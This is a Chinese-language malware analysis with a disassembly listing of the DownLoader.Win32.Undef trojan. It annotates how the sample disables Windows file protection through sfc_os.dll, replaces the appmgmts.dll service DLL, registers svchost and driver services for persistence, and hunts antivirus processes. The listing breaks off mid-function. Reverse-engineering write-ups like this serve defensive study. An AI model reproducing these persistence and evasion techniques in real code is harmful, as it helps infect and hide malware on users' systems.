下载者DownLoader.Win32.Undef分析
DownLoader.Win32.Undef
下载者分析:
分析日期:2010.1.25
- 004018FE http_>/$>push ebp
- 004018FF |.>mov ebp, esp
- 00401901 |.>sub esp, 24
- 00401904 |.>and [local.9], 0
- 00401908 |.>and [local.8], 0
- 0040190C |.>push eax
- 0040190D |.>call 00401912
- 00401912 |$>mov eax, dword ptr [esp]
- 00401915 |.>mov [local.8], eax
- 00401918 |.>pop eax
- 00401919 |.>push 1C ; /n = 1C (28.)
- 0040191B |.>push 0 ; |c = 00
- 0040191D |.>lea eax, [local.7] ; |
- 00401920 |.>push eax ; |s
- 00401921 |.>call <jmp.&MSVCRT.memset> ; /memset 设置缓冲区指定的字符
- 00401926 |.>add esp, 0C
- 00401929 |.>push 1C ; /BufSize = 1C (28.)
- 0040192B |.>lea eax, [local.7] ; |
- 0040192E |.>push eax ; |Buffer
- 0040192F |.>push [local.8] ; |Address
- 00401932 |.>call dword ptr [<&KERNEL32.VirtualQu>; /VirtualQuery
- 00401938 |.>mov eax, [local.6]
- 0040193B |.>mov dword ptr [407574], eax
- 00401940 |.>push 0 ; /pModule = NULL
- 00401942 |.>call dword ptr [<&KERNEL32.GetModule>; /GetModuleHandleA 获取模块句柄
- 00401948 |.>cmp eax, dword ptr [407574] 比较模块基址和3C0000h,用于判断自身是exe还是dll文件
- 0040194E |.>jnz short 00401966 是exe往下执行call 1,是dll跳转到00401966地址 执行call 2
- 00401950 |.>push [arg.4]
- 00401953 |.>push [arg.3]
- 00401956 |.>push [arg.2]
- 00401959 |.>push [arg.1]
- 0040195C |.>call 00401DC4 关键call 1,作用:创建C:/IOSYS.ini配置文件,加载sfc.dll,获得去除文件保护属性的导出函数地址,感染C:/WINDOWS/system32/appmgmts.dll,qmgr.dll
- 00401961 |.>mov [local.9], eax
- 00401964 |.>jmp short 00401977
- 00401966 |>>push [arg.3]
- 00401969 |.>push [arg.2]
- 0040196C |.>push [arg.1]
- 0040196F |.>call 00404295 关键call 2,
- 00401974 |.>mov [local.9], eax
- 00401977 |>>mov eax, [local.9]
- 0040197A |.>leave
- 0040197B /.>retn 10
复制代码
进入关键call 1,代码如下:
- 00401DC4 $>push ebp
- 00401DC5 .>mov ebp, esp
- 00401DC7 .>sub esp, 0C18
- 00401DCD .>and dword ptr [ebp-764], 0
- 00401DD4 .>and dword ptr [ebp-8], 0
- 00401DD8 .>and dword ptr [ebp-124], 0
- 00401DDF .>and dword ptr [ebp-14], 0
- 00401DE3 .>and dword ptr [ebp-654], 0
- 00401DEA .>and dword ptr [ebp-4], 0
- 00401DEE .>and dword ptr [ebp-128], 0
- 00401DF5 .>mov eax, dword ptr [<&USER32.wsprint>
- 00401DFA .>mov dword ptr [ebp-C], eax
- 00401DFD .>call dword ptr [<&USER32.GetInputSta>; [GetInputState
- 00401E03 .>push 0 ; /lParam = 0
- 00401E05 .>push 0 ; |wParam = 0
- 00401E07 .>push 0 ; |Message = WM_NULL
- 00401E09 .>call dword ptr [<&KERNEL32.GetCurren>; |[GetCurrentThreadId
- 00401E0F .>push eax ; |ThreadId
- 00401E10 .>call dword ptr [<&USER32.PostThreadM>; /PostThreadMessageA
- 00401E16 .>push 0 ; /MsgFilterMax = 0
- 00401E18 .>push 0 ; |MsgFilterMin = 0
- 00401E1A .>push 0 ; |hWnd = NULL
- 00401E1C .>lea eax, dword ptr [ebp-24C] ; |
- 00401E22 .>push eax ; |pMsg
- 00401E23 .>call dword ptr [<&USER32.GetMessageA>; /GetMessageA
- 00401E29 .>push 0040757C
- 00401E2E .>push 00407578
- 00401E33 .>push 0
- 00401E35 .>call 0040197E
- 00401E3A .>push 104 ; /BufSize = 104 (260.)
- 00401E3F .>lea eax, dword ptr [ebp-230] ; |
- 00401E45 .>push eax ; |Buffer
- 00401E46 .>call dword ptr [<&KERNEL32.GetWindow>; /GetWindowsDirectoryA
- 00401E4C .>push 104 ; /n = 104 (260.)
- 00401E51 .>push 0 ; |c = 00
- 00401E53 .>lea eax, dword ptr [ebp-120] ; |
- 00401E59 .>push eax ; |s
- 00401E5A .>call <jmp.&MSVCRT.memset> ; /memset
- 00401E5F .>add esp, 0C
- 00401E62 .>lea eax, dword ptr [ebp-120]
- 00401E68 .>push eax ; /Buffer
- 00401E69 .>push 104 ; |BufSize = 104 (260.)
- 00401E6E .>call dword ptr [<&KERNEL32.GetTempPa>; /GetTempPathA
- 00401E74 .>push 0F003F
- 00401E79 .>push 0
- 00401E7B .>push 0
- 00401E7D .>call dword ptr [<&ADVAPI32.OpenSCMan>; advapi32.OpenSCManagerA
- 00401E83 .>mov dword ptr [ebp-4], eax
- 00401E86 .>push 0040536C ; /sfc_os.dll
- 00401E8B .>call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA 加载sfc.dll
- 00401E91 .>mov dword ptr [ebp-654], eax
- 00401E97 .>cmp dword ptr [ebp-654], 0
- 00401E9E .>jnz short 00401EAA
- 00401EA0 .>jmp 004020C8
- 00401EA5 .>jmp 004020C8
- 00401EAA >>push 5 ; /ProcNameOrOrdinal = #5
- 00401EAC .>push dword ptr [ebp-654] ; |hModule
- 00401EB2 .>call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress 获得去除文件保护属性的#5函数地址
- 00401EB8 .>mov dword ptr [407580], eax
- 00401EBD .>and dword ptr [ebp-768], 0
- 00401EC4 .>and dword ptr [ebp-B6C], 0
- 00401ECB .>jmp short 00401EDA
- 00401ECD >>mov eax, dword ptr [ebp-B6C]
- 00401ED3 .>inc eax
- 00401ED4 .>mov dword ptr [ebp-B6C], eax
- 00401EDA >>cmp dword ptr [ebp-B6C], 12
- 00401EE1 .>jge 004020C8
- 00401EE7 .>push dword ptr [ebp-B6C]
- 00401EED .>push 0
- 00401EEF .>push 40
- 00401EF1 .>lea eax, dword ptr [ebp-BB0]
- 00401EF7 .>push eax
- 00401EF8 .>call 004017AC //解密一些可以替换的服务名
- 00401EFD .>push dword ptr [ebp-B6C]
- 00401F03 .>push 1
- 00401F05 .>push 40
- 00401F07 .>lea eax, dword ptr [ebp-BF0]
- 00401F0D .>push eax
- 00401F0E .>call 004017AC //解密可以替换的服务对应的组件文件名
- 00401F13 .>push 0F01FF
- 00401F18 .>lea eax, dword ptr [ebp-BB0]
- 00401F1E .>push eax
- 00401F1F .>push dword ptr [ebp-4]
- 00401F22 .>call dword ptr [<&ADVAPI32.OpenServi>; advapi32.OpenServiceA
- 00401F28 .>mov dword ptr [ebp-128], eax
- 00401F2E .>cmp dword ptr [ebp-128], 0
- 00401F35 .>jnz short 00401F39
- 00401F37 .>jmp short 00401ECD //打开服务打开后返回上面选择下一个服务
- 00401F39 >>lea eax, dword ptr [ebp-C0C]
- 00401F3F .>push eax
- 00401F40 .>push dword ptr [ebp-128]
- 00401F46 .>call dword ptr [<&ADVAPI32.QueryServ>; advapi32.QueryServiceStatus 查找名为"AppMgmt"的服务,若找到,检查服务状态,如果该服务已启动,将其终止。
- 00401F4C .>cmp dword ptr [ebp-C08], 1
- 00401F53 .>je short 00401F8B
- 00401F55 .>cmp dword ptr [ebp-768], 0
- 00401F5C .>jnz short 00401F68
- 00401F5E .>jmp 0040207E //当服务状态查询返回失败的时候,跳至0040207E
- 00401F63 .>jmp 0040207E
- 00401F68 >>lea eax, dword ptr [ebp-C0C]
- 00401F6E .>push eax
- 00401F6F .>push 1
- 00401F71 .>push dword ptr [ebp-128]
- 00401F77 .>call dword ptr [<&ADVAPI32.ControlSe>; advapi32.ControlService
- 00401F7D .>test eax, eax
- 00401F7F .>jnz short 00401F8B
- 00401F81 .>jmp 0040207E
- 00401F86 .>jmp 0040207E
- 00401F8B >>push 104 ; /n = 104 (260.)
- 00401F90 .>push 0 ; |c = 00
- 00401F92 .>lea eax, dword ptr [ebp-760] ; |
- 00401F98 .>push eax ; |s
- 00401F99 .>call <jmp.&MSVCRT.memset> ; /memset
- 00401F9E .>add esp, 0C
- 00401FA1 .>cmp dword ptr [ebp-764], 0
- 00401FA8 .>jnz short 00401FD4
- 00401FAA .>push 00405378 ; /.dll
- 00401FAF .>lea eax, dword ptr [ebp-BF0] ; |
- 00401FB5 .>push eax ; |<%s>
- 00401FB6 .>lea eax, dword ptr [ebp-230] ; |
- 00401FBC .>push eax ; |<%s>
- 00401FBD .>push 00405380 ; |%s/system32/%s%s
- 00401FC2 .>lea eax, dword ptr [ebp-760] ; |
- 00401FC8 .>push eax ; |s
- 00401FC9 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 连接字符串 C:/WINDOWS/system32/appmgmts.dll
- 00401FCF .>add esp, 14
- 00401FD2 .>jmp short 00402009
- 00401FD4 >>call 0040176E
- 00401FD9 .>push eax ; /<%d>
- 00401FDA .>lea eax, dword ptr [ebp-120] ; |
- 00401FE0 .>push eax ; |<%s>
- 00401FE1 .>push 00405394 ; |%s%d.dll
- 00401FE6 .>lea eax, dword ptr [ebp-760] ; |
- 00401FEC .>push eax ; |s
- 00401FED .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 连接字符串
- 00401FF3 .>add esp, 10
- 00401FF6 .>lea eax, dword ptr [ebp-760]
- 00401FFC .>push eax
- 00401FFD .>lea eax, dword ptr [ebp-BB0]
- 00402003 .>push eax
- 00402004 .>call 00401B0C
- 00402009 >>lea eax, dword ptr [ebp-760]
- 0040200F .>push eax
- 00402010 .>call 00401BBD ; 检查文件appmgmts.dll是否存在
- 00402015 .>test eax, eax
- 00402017 .>jnz short 0040201D 若不存在,则创建C:/System32/appmgmts.dll。若找到appmgmts.dll,则去掉该文件保护属性,释放病毒动态链接库并命名为appmgmts.dll
- 00402019 .>jmp short 0040207E 若被感染就往下跳转
- 0040201B .>jmp short 0040207E
- 0040201D >>push 0
- 0040201F .>push 0
- 00402021 .>push dword ptr [ebp-128]
- 00402027 .>call dword ptr [<&ADVAPI32.StartServ>; advapi32.StartServiceA 启动"AppMgmt"服务,通过该服务加载C:/System32/appmgmts.dll。
- 0040202D .>test eax, eax
- 0040202F .>jnz short 00402035 ;
- 00402031 .>jmp short 0040207E
- 00402033 .>jmp short 0040207E
- 00402035 >>push dword ptr [ebp-654] ; /hLibModule
- 0040203B .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 00402041 .>push dword ptr [ebp-128]
- 00402047 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 0040204D .>push dword ptr [ebp-4]
- 00402050 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 00402056 .>cmp dword ptr [407578], 0
- 0040205D .>je short 00402076
- 0040205F .>mov eax, dword ptr [407578]
- 00402064 .>mov dword ptr [ebp-C10], eax
- 0040206A .>push dword ptr [ebp-C10]
- 00402070 .>call <jmp.&MSVCRT.operator delete>
- 00402075 .>pop ecx
- 00402076 >>push 0 ; /ExitCode = 0
- 00402078 .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
- 0040207E >>cmp dword ptr [ebp-764], 1
- 00402085 .>jnz short 00402094
- 00402087 .>lea eax, dword ptr [ebp-760]
- 0040208D .>push eax ; /FileName
- 0040208E .>call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
- 00402094 >>push dword ptr [ebp-128]
- 0040209A .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 004020A0 .>cmp dword ptr [ebp-B6C], 11
- 004020A7 .>jnz short 004020C3
- 004020A9 .>cmp dword ptr [ebp-768], 0
- 004020B0 .>jnz short 004020C3
- 004020B2 .>mov dword ptr [ebp-768], 1
- 004020BC .>or dword ptr [ebp-B6C], FFFFFFFF
- 004020C3 >>jmp 00401ECD //服务状态查询返回失败选择下一个服务
- 004020C8 >>lea eax, dword ptr [ebp-10]
- 004020CB .>push eax ; /pHandle
- 004020CC .>push 1 ; |Access = KEY_QUERY_VALUE
- 004020CE .>push 0 ; |Reserved = 0
- 004020D0 .>push 004053A0 ; |SOFTWARE/Microsoft/Windows NT/CurrentVersion/Svchost
- 004020D5 .>push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
- 004020DA .>call dword ptr [<&ADVAPI32.RegOpenKe>; /RegOpenKeyExA
- 004020E0 .>push 400 ; /n = 400 (1024.)
- 004020E5 .>push 0 ; |c = 00
- 004020E7 .>lea eax, dword ptr [ebp-B68] ; |
- 004020ED .>push eax ; |s
- 004020EE .>call <jmp.&MSVCRT.memset> ; /memset
- 004020F3 .>add esp, 0C
- 004020F6 .>mov dword ptr [ebp-14], 400
- 004020FD .>lea eax, dword ptr [ebp-14]
- 00402100 .>push eax ; /pBufSize
- 00402101 .>lea eax, dword ptr [ebp-B68] ; |
- 00402107 .>push eax ; |Buffer
- 00402108 .>lea eax, dword ptr [ebp-124] ; |
- 0040210E .>push eax ; |pValueType
- 0040210F .>push 0 ; |Reserved = NULL
- 00402111 .>push 004053D8 ; |netsvcsvcs%SystemRoot%/System32/svchost.exe -k nets
- 00402116 .>push dword ptr [ebp-10] ; |hKey
- 00402119 .>call dword ptr [<&ADVAPI32.RegQueryV>; /RegQueryValueExA
- 0040211F .>push dword ptr [ebp-10] ; /hKey
- 00402122 .>call dword ptr [<&ADVAPI32.RegCloseK>; /RegCloseKey
- 00402128 .>lea eax, dword ptr [ebp-B68]
- 0040212E .>mov dword ptr [ebp-8], eax
- 00402131 >>mov eax, dword ptr [ebp-8]
- 00402134 .>movsx eax, byte ptr [eax]
- 00402137 .>test eax, eax
- 00402139 .>je 004022AF
- 0040213F .>push 400 ; /n = 400 (1024.)
- 00402144 .>push 0 ; |c = 00
- 00402146 .>lea eax, dword ptr [ebp-650] ; |
- 0040214C .>push eax ; |s
- 0040214D .>call <jmp.&MSVCRT.memset> ; /memset
- 00402152 .>add esp, 0C
- 00402155 .>push 004053E0 ; vcs%SystemRoot%/System32/svchost.exe -k nets
- 0040215A .>push 004053E4 ; %SystemRoot%/System32/svchost.exe -k nets
- 0040215F .>push 00405410 ; %s%s
- 00402164 .>lea eax, dword ptr [ebp-650]
- 0040216A .>push eax
- 0040216B .>call dword ptr [ebp-C]
- 0040216E .>add esp, 10
- 00402171 .>push 0 ; /Password = NULL
- 00402173 .>push 0 ; |ServiceStartName = NULL
- 00402175 .>push 0 ; |pDependencies = NULL
- 00402177 .>push 0 ; |pTagId = NULL
- 00402179 .>push 0 ; |LoadOrderGroup = NULL
- 0040217B .>lea eax, dword ptr [ebp-650] ; |
- 00402181 .>push eax ; |BinaryPathName
- 00402182 .>push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL
- 00402184 .>push 2 ; |StartType = SERVICE_AUTO_START
- 00402186 .>push 20 ; |ServiceType = SERVICE_WIN32_SHARE_PROCESS
- 00402188 .>push 10 ; |DesiredAccess = SERVICE_START
- 0040218A .>push dword ptr [ebp-8] ; |DisplayName
- 0040218D .>push dword ptr [ebp-8] ; |ServiceName
- 00402190 .>push dword ptr [ebp-4] ; |hManager
- 00402193 .>call dword ptr [<&ADVAPI32.CreateSer>; /CreateServiceA
- 00402199 .>mov dword ptr [ebp-128], eax
- 0040219F .>cmp dword ptr [ebp-128], 0
- 004021A6 .>je 00402281
- 004021AC .>cmp dword ptr [ebp-764], 0
- 004021B3 .>jnz short 004021DB
- 004021B5 .>push 00405378 ; /.dll
- 004021BA .>push dword ptr [ebp-8] ; |<%s>
- 004021BD .>lea eax, dword ptr [ebp-230] ; |
- 004021C3 .>push eax ; |<%s>
- 004021C4 .>push 00405380 ; |%s/system32/%s%s
- 004021C9 .>lea eax, dword ptr [ebp-760] ; |
- 004021CF .>push eax ; |s
- 004021D0 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 004021D6 .>add esp, 14
- 004021D9 .>jmp short 004021FD
- 004021DB >>call 0040176E
- 004021E0 .>push eax ; /<%d>
- 004021E1 .>lea eax, dword ptr [ebp-120] ; |
- 004021E7 .>push eax ; |<%s>
- 004021E8 .>push 00405394 ; |%s%d.dll
- 004021ED .>lea eax, dword ptr [ebp-760] ; |
- 004021F3 .>push eax ; |s
- 004021F4 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 004021FA .>add esp, 10
- 004021FD >>lea eax, dword ptr [ebp-760]
- 00402203 .>push eax
- 00402204 .>push dword ptr [ebp-8]
- 00402207 .>call 00401B0C
- 0040220C .>lea eax, dword ptr [ebp-760]
- 00402212 .>push eax
- 00402213 .>call 00401BBD
- 00402218 .>test eax, eax
- 0040221A .>jnz short 00402220
- 0040221C .>jmp short 00402281
- 0040221E .>jmp short 00402281
- 00402220 >>push 0
- 00402222 .>push 0
- 00402224 .>push dword ptr [ebp-128]
- 0040222A .>call dword ptr [<&ADVAPI32.StartServ>; advapi32.StartServiceA
- 00402230 .>test eax, eax
- 00402232 .>jnz short 00402238
- 00402234 .>jmp short 00402281
- 00402236 .>jmp short 00402281
- 00402238 >>push dword ptr [ebp-654] ; /hLibModule
- 0040223E .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 00402244 .>push dword ptr [ebp-128]
- 0040224A .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 00402250 .>push dword ptr [ebp-4]
- 00402253 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 00402259 .>cmp dword ptr [407578], 0
- 00402260 .>je short 00402279
- 00402262 .>mov eax, dword ptr [407578]
- 00402267 .>mov dword ptr [ebp-C14], eax
- 0040226D .>push dword ptr [ebp-C14]
- 00402273 .>call <jmp.&MSVCRT.operator delete>
- 00402278 .>pop ecx
- 00402279 >>push 0 ; /ExitCode = 0
- 0040227B .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
- 00402281 >>cmp dword ptr [ebp-764], 1
- 00402288 .>jnz short 00402297
- 0040228A .>lea eax, dword ptr [ebp-760]
- 00402290 .>push eax ; /FileName
- 00402291 .>call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
- 00402297 >>push dword ptr [ebp-8] ; /String
- 0040229A .>call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 004022A0 .>mov ecx, dword ptr [ebp-8]
- 004022A3 .>lea eax, dword ptr [ecx+eax+1]
- 004022A7 .>mov dword ptr [ebp-8], eax
- 004022AA .>jmp 00402131
- 004022AF >>push dword ptr [ebp-654] ; /hLibModule
- 004022B5 .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 004022BB .>push dword ptr [ebp-4]
- 004022BE .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 004022C4 .>cmp dword ptr [407578], 0
- 004022CB .>je short 004022E4
- 004022CD .>mov eax, dword ptr [407578]
- 004022D2 .>mov dword ptr [ebp-C18], eax
- 004022D8 .>push dword ptr [ebp-C18]
- 004022DE .>call <jmp.&MSVCRT.operator delete>
- 004022E3 .>pop ecx
- 004022E4 >>push 0 ; /ExitCode = 0
- 004022E6 .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
- 004022EC .>leave
- 004022ED .>retn 10
复制代码
进入关键call 2,代码如下:
- 003C4295 /$ 5>push ebp
- 003C4296 |. 8>mov ebp, esp
- 003C4298 |. 8>cmp [arg.2], 1
- 003C429C |. 7>jnz short 003C42B3
- 003C429E |. 6>push 0 ; /pThreadId = NULL
- 003C42A0 |. 6>push 0 ; |CreationFlags = 0
- 003C42A2 |. 6>push 0 ; |pThreadParm = NULL
- 003C42A4 |. 6>push 003C43D1 ; |ThreadFunction = appmgmts.003C43D1
- 003C42A9 |. 6>push 0 ; |StackSize = 0
- 003C42AB |. 6>push 0 ; |pSecurity = NULL
- 003C42AD |. F>call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建一个线程1
- 003C42B3 |> 3>xor eax, eax
- 003C42B5 |. 4>inc eax
- 003C42B6 |. 5>pop ebp
- 003C42B7 /. C>retn 0C
复制代码
进入线程 1,代码如下:
- 003C43D1 >push ebp
- 003C43D2 >mov ebp, esp
- 003C43D4 >mov eax, 1DA0
- 003C43D9 >call 003C4920
- 003C43DE >and dword ptr [ebp-18], 0
- 003C43E2 >and dword ptr [ebp-8], 0
- 003C43E6 >and dword ptr [ebp-14], 0
- 003C43EA >and dword ptr [ebp-1C], 0
- 003C43EE >and dword ptr [ebp-20], 0
- 003C43F2 >or dword ptr [ebp-10], FFFFFFFF
- 003C43F6 >and dword ptr [ebp-4], 0
- 003C43FA >mov eax, dword ptr [<&USER32.wsprint>
- 003C43FF >mov dword ptr [ebp-C], eax
- 003C4402 >mov eax, dword ptr [<&SHLWAPI.SHDele>
- 003C4407 >mov dword ptr [ebp-930], eax
- 003C440D >mov eax, dword ptr [<&KERNEL32.Sleep>
- 003C4412 >mov dword ptr [ebp-92C], eax
- 003C4418 >push 0
- 003C441A >call 003C1550 打开配置文件C:/IOSYS.ini
- 003C441F >mov dword ptr [3C7588], eax
- 003C4424 >push 003C564C ; ASCII "avp.exe"
- 003C4429 >call 003C1000 关闭遍历进程杀毒软件
- 003C442E >test eax, eax
- 003C4430 >jnz short 003C4440
- 003C4432 >push 003C5654 ; ASCII "bdagent.exe"
- 003C4437 >call 003C1000 关闭遍历进程杀毒软件
- 003C443C >test eax, eax
- 003C443E >je short 003C4445
- 003C4440 >call 003C133B
- 003C4445 >push 0
- 003C4447 >push dword ptr [3C600C]
- 003C444D >push 800
- 003C4452 >push 003C6350
- 003C4457 >call 003C1680 解密字符函数,这里解密出KVMonXP.kxp
- 003C445C >push 104 ; /n = 104 (260.)
- 003C4461 >push 0 ; |c = 00
- 003C4463 >push 003C7368 ; |s = appmgmts.003C7368
- 003C4468 >call <jmp.&MSVCRT.memset> ; /memset
- 003C446D >add esp, 0C
- 003C4470 >push 003C7368 ; /Buffer = appmgmts.003C7368
- 003C4475 >push 104 ; |BufSize = 104 (260.)
- 003C447A >call dword ptr [<&KERNEL32.GetTempPa>; /GetTempPathA
- 003C4480 >push 104 ; /n = 104 (260.)
- 003C4485 >push 0 ; |c = 00
- 003C4487 >push 003C7470 ; |s = appmgmts.003C7470
- 003C448C >call <jmp.&MSVCRT.memset> ; /memset
- 003C4491 >add esp, 0C
- 003C4494 >push 104 ; /BufSize = 104 (260.)
- 003C4499 >push 003C7470 ; |Buffer = appmgmts.003C7470
- 003C449E >call dword ptr [<&KERNEL32.GetSystem>; /GetSystemDirectoryA
- 003C44A4 >push 104 ; /n = 104 (260.)
- 003C44A9 >push 0 ; |c = 00
- 003C44AB >lea eax, dword ptr [ebp-B40] ; |
- 003C44B1 >push eax ; |s
- 003C44B2 >call <jmp.&MSVCRT.memset> ; /memset
- 003C44B7 >add esp, 0C
- 003C44BA >push 003C5660 ; ASCII "Accopt.sys"
- 003C44BF >push 003C7368
- 003C44C4 >push 003C5410 ; ASCII "%s%s"
- 003C44C9 >lea eax, dword ptr [ebp-B40]
- 003C44CF >push eax
- 003C44D0 >call dword ptr [ebp-C] 字符连接函数
- 003C44D3 >add esp, 10
- 003C44D6 >push 80
- 003C44DB >push 65
- 003C44DD >push dword ptr [3C7574] ; appmgmts.003C0000
- 003C44E3 >lea eax, dword ptr [ebp-B40]
- 003C44E9 >push eax
- 003C44EA >call 003C13FE 获取自身资源信息
- 003C44EF >lea eax, dword ptr [ebp-B40]
- 003C44F5 >push eax
- 003C44F6 >call 003C4361 创建一个名为Accopt的服务
- 003C44FB >push 400 ; /n = 400 (1024.)
- 003C4500 >push 0 ; |c = 00
- 003C4502 >lea eax, dword ptr [ebp-F40] ; |
- 003C4508 >push eax ; |s
- 003C4509 >call <jmp.&MSVCRT.memset> ; /memset
- 003C450E >add esp, 0C
- 003C4511 >push 003C5644 ; /<%s> = "Accopt"
- 003C4516 >push dword ptr [3C6004] ; |<%s> = "SYSTEM/CurrentControlSet/Services"
- 003C451C >push 003C534C ; |Format = "%s/%s"
- 003C4521 >lea eax, dword ptr [ebp-F40] ; |
- 003C4527 >push eax ; |s
- 003C4528 >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 003C452E >add esp, 10
- 003C4531 >lea eax, dword ptr [ebp-F40]
- 003C4537 >push eax
- 003C4538 >push 80000002
- 003C453D >call dword ptr [ebp-930] SHDeleteKey
- 003C4543 >lea eax, dword ptr [ebp-B40]
- 003C4549 >push eax ; /FileName
- 003C454A >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA 删除驱动Accopt.sys文件
- 003C4550 >push 104 ; /BufSize = 104 (260.)
- 003C4555 >lea eax, dword ptr [ebp-A38] ; |
- 003C455B >push eax ; |PathBuffer
- 003C455C >push dword ptr [3C7574] ; |hModule = 003C0000 (appmgmts)
- 003C4562 >call dword ptr [<&KERNEL32.GetModule>; /GetModuleFileNameA
- 003C4568 >push 5C ; /c = 5C ('/')
- 003C456A >lea eax, dword ptr [ebp-A38] ; |
- 003C4570 >push eax ; |s
- 003C4571 >call dword ptr [<&MSVCRT.strrchr>] ; /strrchr
- 003C4577 >pop ecx
- 003C4578 >pop ecx
- 003C4579 >inc eax
- 003C457A >push eax ; /String2
- 003C457B >lea eax, dword ptr [ebp-928] ; |
- 003C4581 >push eax ; |String1
- 003C4582 >call dword ptr [<&KERNEL32.lstrcpyA>>; /lstrcpyA
- 003C4588 >push 2E ; /c = 2E ('.')
- 003C458A >lea eax, dword ptr [ebp-928] ; |
- 003C4590 >push eax ; |s
- 003C4591 >call dword ptr [<&MSVCRT.strrchr>] ; /strrchr
- 003C4597 >pop ecx
- 003C4598 >pop ecx
- 003C4599 >and dword ptr [eax], 0
- 003C459C >and dword ptr [ebp-F44], 0
- 003C45A3 >jmp short 003C45B2
- 003C45A5 >mov eax, dword ptr [ebp-F44]
- 003C45AB >inc eax
- 003C45AC >mov dword ptr [ebp-F44], eax
- 003C45B2 >cmp dword ptr [ebp-F44], 12
- 003C45B9 >jge 003C4687
- 003C45BF >push dword ptr [ebp-F44]
- 003C45C5 >push 0
- 003C45C7 >push 40
- 003C45C9 >lea eax, dword ptr [ebp-F88]
- 003C45CF >push eax
- 003C45D0 >call 003C17AC
- 003C45D5 >push dword ptr [ebp-F44]
- 003C45DB >push 1
- 003C45DD >push 40
- 003C45DF >lea eax, dword ptr [ebp-FC8]
- 003C45E5 >push eax
- 003C45E6 >call 003C17AC
- 003C45EB >lea eax, dword ptr [ebp-FC8]
- 003C45F1 >push eax ; /String2
- 003C45F2 >lea eax, dword ptr [ebp-928] ; |
- 003C45F8 >push eax ; |String1
- 003C45F9 >call dword ptr [<&KERNEL32.lstrcmpiA>; /lstrcmpiA
- 003C45FF >test eax, eax
- 003C4601 >jnz short 003C4682
- 003C4603 >and dword ptr [ebp-FCC], 0
- 003C460A >mov dword ptr [ebp-FD0], 2
- 003C4614 >lea eax, dword ptr [ebp-F88]
- 003C461A >push eax ; /<%s>
- 003C461B >push dword ptr [3C6004] ; |<%s> = "SYSTEM/CurrentControlSet/Services"
- 003C4621 >push 003C534C ; |Format = "%s/%s"
- 003C4626 >lea eax, dword ptr [ebp-13D0] ; |
- 003C462C >push eax ; |s
- 003C462D >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 003C4633 >add esp, 10
- 003C4636 >lea eax, dword ptr [ebp-FCC]
- 003C463C >push eax ; /pHandle
- 003C463D >push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
- 003C4642 >push 0 ; |Reserved = 0
- 003C4644 >lea eax, dword ptr [ebp-13D0] ; |
- 003C464A >push eax ; |Subkey
- 003C464B >push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
- 003C4650 >call dword ptr [<&ADVAPI32.RegOpenKe>; /RegOpenKeyExA
- 003C4656 >push 4 ; /BufSize = 4
- 003C4658 >lea eax, dword ptr [ebp-FD0] ; |
- 003C465E >push eax ; |Buffer
- 003C465F >push 4 ; |ValueType = REG_DWORD
- 003C4661 >push 0 ; |Reserved = 0
- 003C4663 >push 003C566C ; |ValueName = "Start"
- 003C4668 >push dword ptr [ebp-FCC] ; |hKey
- 003C466E >call dword ptr [<&ADVAPI32.RegSetVal>; /RegSetValueExA
- 003C4674 >push dword ptr [ebp-FCC] ; /hKey
- 003C467A >call dword ptr [<&ADVAPI32.RegCloseK>; /RegCloseKey
- 003C4680 >jmp short 003C4687
- 003C4682 >jmp 003C45A5
- 003C4687 >push 0 ; /hTemplateFile = NULL
- 003C4689 >push 80 ; |Attributes = NORMAL
- 003C468E >push 3 ; |Mode = OPEN_EXISTING
- 003C4690 >push 0 ; |pSecurity = NULL
- 003C4692 >push 1 ; |ShareMode = FILE_SHARE_READ
- 003C4694 >push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
- 003C4699 >push 003C5674 ; |FileName = "//./Accopt"
- 003C469E >call dword ptr [<&KERNEL32.CreateFil>; /CreateFileA
- 003C46A4 >mov dword ptr [ebp-10], eax
- 003C46A7 >cmp dword ptr [ebp-10], -1
- 003C46AB >jnz short 003C46B7
- 003C46AD >jmp 003C48A2
- 003C46B2 >jmp 003C48A2
- 003C46B7 >cmp dword ptr [ebp-4], 0
- 003C46BB >jnz 003C4755
- 003C46C1 >and dword ptr [ebp-14DC], 0
- 003C46C8 >and dword ptr [ebp-14E0], 0
- 003C46CF >push 104 ; /n = 104 (260.)
- 003C46D4 >push 0 ; |c = 00
- 003C46D6 >lea eax, dword ptr [ebp-14D8] ; |
- 003C46DC >push eax ; |s
- 003C46DD >call <jmp.&MSVCRT.memset> ; /memset
- 003C46E2 >add esp, 0C
- 003C46E5 >lea eax, dword ptr [ebp-14D8]
- 003C46EB >push eax
- 003C46EC >call 003C10A6
- 003C46F1 >mov dword ptr [ebp-14DC], eax
